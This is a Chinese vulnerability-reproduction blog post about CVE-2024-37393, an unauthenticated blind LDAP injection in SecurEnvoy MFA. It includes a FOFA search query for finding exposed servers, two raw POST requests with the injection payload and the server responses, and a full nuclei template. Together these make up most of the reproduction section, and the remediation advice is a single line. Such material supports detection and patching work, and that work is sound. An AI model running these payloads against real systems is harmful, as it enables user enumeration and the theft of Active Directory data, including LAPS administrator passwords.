CVE-2024-37393 漏洞复现

admin
admin
admin
108209
文章
90
评论
2024年6月17日08:37:02评论33 views字数 3643阅读12分8秒阅读模式

使

01

漏洞名称

SecurEnvoy身份验证-LDAP注入漏洞

02

漏洞影响

multi-factor_authentication_solutions 9.4.514之前版本

03

漏洞描述

SecurEnvoy MFA是一种广泛使用的软件解决方案,为第三方服务或设备(例如,思杰、FortiGate.)提供双因素身份验证(2 FA)支持。

SecurEnvoy充当RADIUS服务器,并依赖LDAP服务(例如微软Active Directory,OpenLDAP)来验证其用户。它使用目录的内部密码处理来检查第一因素(依赖于LDAP绑定方法),并扩展目录使用以允许在授予用户访问权限之前检查第二因素("PIN代码")。

由于对用户提供的输入的验证不当,在9.4.514之前 SecurEnvoyMFA中存在多个LDAP注入漏洞。未经身份验证的远程攻击者可以通过对/secserver HTTP端点上暴露的 DESKTOP 服务进行盲目的LDAP注入攻击,从Active Directory中泄漏数据。包括ms-Mcs-AdmPwd,它为本地管理员密码解决方案(LAPS)功能提供了明文密码。

04

FOFA搜索语句
title="SecurEnvoy"

CVE-2024-37393 漏洞复现

05

漏洞复现

当将第一行为FLAG=DESKTOP的POST数据发送到/secserverHTTP端点时,会触发实现“DESKTOP”协议的特定代码。

在这些参数中,USERID用于在发送特殊STATUS变量时执行用户身份验证。我们能够使用下面的协议消息来枚举绑定到SecurEnvoy(例如Active Directory)的目录中的现有用户。

此请求允许未经身份验证的用户检查SecurEnvoy目录中是否存在SomeUser。之所以能够做到这一点,是因为服务器响应会根据用户是否存在而有所不同,用户不存在时响应内容为

VERSION:9.3.502 RETURN:Error checking Group, ERR, DN is not set AUTH:DENIED

用户存在时响应内容为

VERSION:9.3.502RETURN:OKGETPASSCODE:False

POC数据包如下:

第一步:

POST /secserver/ HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Edg/94.0.992.47Connection: closeContent-Length: 98Accept-Encoding: gzipFLAG=DESKTOP1STATUS:INITUSERID:bvsakzz7oistfjkq8drw)(sAMAccountName=*MEMBEROF:Domain Users

响应内容如下

HTTP/1.1 200 OKConnection: closeContent-Length: 79Content-Type: text/plainDate: Fri, 14 Jun 2024 01:39:34 GMTStrict-Transport-Security: max-age=16070400; includeSubDomainsX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockVERSION:9.3.502RETURN:Error checking Group, ERR, DN is not setAUTH:DENIED

第二步:

POST /secserver/ HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 79Accept-Encoding: gzipFLAG=DESKTOP1STATUS:INITUSERID:*)(sAMAccountName=*MEMBEROF:Domain Users

响应内容:

HTTP/1.1 200 OKConnection: closeContent-Length: 49Content-Type: text/plainDate: Fri, 14 Jun 2024 01:39:35 GMTStrict-Transport-Security: max-age=16070400; includeSubDomainsX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockVERSION:9.3.502RETURN:OKGETPASSCODE:False

06

nuclei poc

官方已发布POC,亲测有效,poc文件内容如下

id: CVE-2024-37393info:  name: SecurEnvoy Two Factor Authentication - LDAP Injection  author: securityforeveryone  severity: critical  description: |    Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.  reference:    - https://www.tenable.com/cve/CVE-2024-37393    - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393    - https://securenvoy.com  metadata:    verified: true    shodan-query: title:"SecurEnvoy"    fofa-query: title="SecurEnvoy"  tags: cve,cve2024,securenvoy,ldapvariables:  userid: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /secserver/? HTTP/2        Host: {{Hostname}}        FLAG=DESKTOP        1        STATUS:INIT        USERID:{{userid}})(sAMAccountName=*        MEMBEROF:Domain Users      - |        POST /secserver/? HTTP/2        Host: {{Hostname}}        FLAG=DESKTOP        1        STATUS:INIT        USERID:*)(sAMAccountName=*        MEMBEROF:Domain Users    matchers:      - type: dsl        dsl:          - "contains(body_1, 'Error checking Group')"          - "status_code_1 == 200"          - "contains(body_2, 'GETPASSCODE')"          - "status_code_2 == 200"        condition: and# digest: 490a0046304402207956ded5a27d1c12f6487316e5b14bb02bb6977fa43bc048e1a21ac9010125480220063cb9fbb223d773537cc685ba85640b97d10412c97695ac541f5ecbac760bbd:922c64590222798bb761d5b6d8e72950

CVE-2024-37393 漏洞复现

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-37393 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月17日08:37:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-37393 漏洞复现https://cn-sec.com/archives/2848775.html

发表评论

匿名网友 填写信息